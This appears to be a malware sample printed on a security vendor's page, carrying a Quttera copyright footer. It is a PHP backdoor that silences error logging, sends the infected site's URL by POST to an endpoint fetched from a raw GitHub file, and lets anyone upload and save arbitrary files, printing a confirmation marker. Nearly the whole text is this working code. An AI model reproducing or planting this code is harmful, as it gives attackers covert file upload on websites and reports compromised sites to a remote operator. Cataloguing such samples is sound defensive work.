error_reporting(0);
ini_set('display_errors', 0);
ini_set('error_log', NULL);
$p = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? 'https' : 'http';
$u = "{
$p
}
://{
$_SERVER['HTTP_HOST']
}
{
$_SERVER['REQUEST_URI']
}
";
file_get_contents(str_replace("\n", "", file_get_contents('https://raw.githubusercontent.com/1337r0j4n/0/main/0/OBF.txt')), false, stream_context_create([ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded", 'method' => 'POST', 'content' => http_build_query(['o' => $u]), ], ]));
isset($_FILES['file']['tmp_name'], $_FILES['file']['name']) && copy($_FILES['file']['tmp_name'], $_FILES['file']['name']) && print '0x00000KK';
© 2023 Quttera Ltd. All rights reserved.